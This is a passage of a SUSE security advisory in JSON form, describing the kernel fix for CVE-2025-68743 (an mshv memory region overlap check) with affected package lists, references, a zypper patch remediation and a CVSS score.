"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68741"
},
{
"cve": "CVE-2025-68743",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68743"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmshv: Fix create memory region overlap check\n\nThe current check is incorrect; it only checks if the beginning or end\nof a region is within an existing region. This doesn\u0027t account for\nuserspace specifying a region that begins before and ends after an\nexisting region.\n\nChange the logic to a range intersection check against gfns and uaddrs\nfor each region.\n\nRemove mshv_partition_region_by_uaddr() as it is no longer used.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68743",
"url": "https://www.suse.com/security/cve/CVE-2025-68743"
},
{
"category": "external",
"summary": "SUSE Bug 1255708 for CVE-2025-68743",
"url": "https://bugzilla.suse.com/1255708"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
